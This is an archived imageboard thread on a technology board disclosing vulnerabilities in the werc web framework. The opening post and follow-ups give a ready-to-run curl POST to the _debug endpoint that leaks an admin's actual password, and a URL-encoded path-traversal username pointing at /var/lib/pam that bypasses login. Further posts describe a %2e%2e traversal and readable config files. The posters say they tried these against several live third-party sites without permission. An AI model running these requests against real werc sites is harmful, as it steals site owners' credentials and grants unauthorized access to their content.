[a / b / c / d / e / f / g / gif / h / hr / k / m / o / p / r / s / t / u / v / vg / vm / vmg / vr / vrpg / vst / w / wg] [i / ic] [r9k / s4s / vip] [cm / hm / lgbt / y] [3 / aco / adv / an / bant / biz / cgl / ck / co / diy / fa / fit / gd / hc / his / int / jp / lit / mlp / mu / n / news / out / po / pol / pw / qst / sci / soc / sp / tg / toy / trv / tv / vp / vt / wsg / wsr / x / xs] [Settings] [Search] [Mobile] [Home]
Board
Settings Mobile Home
/g/ - Technology


Thread archived.
You cannot reply anymore.


[Advertise on 4chan]


File: icon01.jpg (5 KB, 100x100)
5 KB JPG
https://werc.cat-v.org/ is advertised to be "A sane web anti-framework" but in reality it's a shell-powered monstrosity. A simple GPT 5.5 security pass found a lot of shit, but the most critical:

1) If a default-install werc with _debug is hosted behind Apache (maybe Nginx/others too), _debug will expose a lot of env vars of werc. The issue is that werc's user auth path dumps the wrong password into one of the env vars (remember, it's all in shell after all), so if a werc-powered website uses Apache and has _debug, if you know the admin login you can get their password by simply doing

curl -sS -X POST https://host.com/_debug --data-urlencode 'user_name=admin' --data-urlencode 'user_password=wrong' | rg "Pass wrong"


You'll get something like:

_status=Notloggedin:Auth: Pass wrong doesnt match correctpassword


(Tested on a real werc-powered website, works)

2) Related to the 1st one, this time if the host is a Linux distro with PAM. You see, that auth thing has arbitrary path traversal in the username, but auth always works against the filename "password", so it's not useful for random files. But on modern Linux distros there's /var/lib/pam/password, and the first line is "Module: unix" (werc's auth splits by colon) so if you do something like
user_name=..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fpam&user_password=unix

(the amount of ../ depends on the actual setup)

you will get authorized, and depending on perms could write wiki pages or comments.


3) Path traversal if rc-httpd is used, although seems like most hosts are mitigated (separate user, I guess?). It doesn't escape things like %2e%2e/%2e%2e
>>
4chan ate the first cmd, it should be

curl -sS -X POST https://host.com/_debug --data-urlencode 'user_name=admin' --data-urlencode 'user_password=wrongpassword' | rg "Pass wrong"
>>
Forgot to mention, the login page is usually _users/login
>>
_debug itself seems to be exposed on any webservers except rc-httpd and OpenBSD httpd, those two just show an empty file (or maybe they are all setup the other way), but I've tried close to 10 other instances on lighttpd/nginx/apache and they all expose _debug
>>
bumping
>>
You can also fetch _werc/config on all those websites (or a lot of other files that werc doesn't expose through the web interface), but usually there's nothing interesting there
>>
last bump, 9larpers lost as usual
>>
File: 1666479507258337.jpg (15 KB, 400x400)
15 KB JPG
>>108794381
>last bump, 9larpers lost as usual
sounds interesting
>>
>>108794112
they written a website in bash? lamao, retards....
>>
>>108794112
All three plan9 users on suicide watch.



[Advertise on 4chan]

Delete Post: [File Only] Style:
[Disable Mobile View / Use Desktop Site]

[Enable Mobile View / Use Mobile Site]

All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.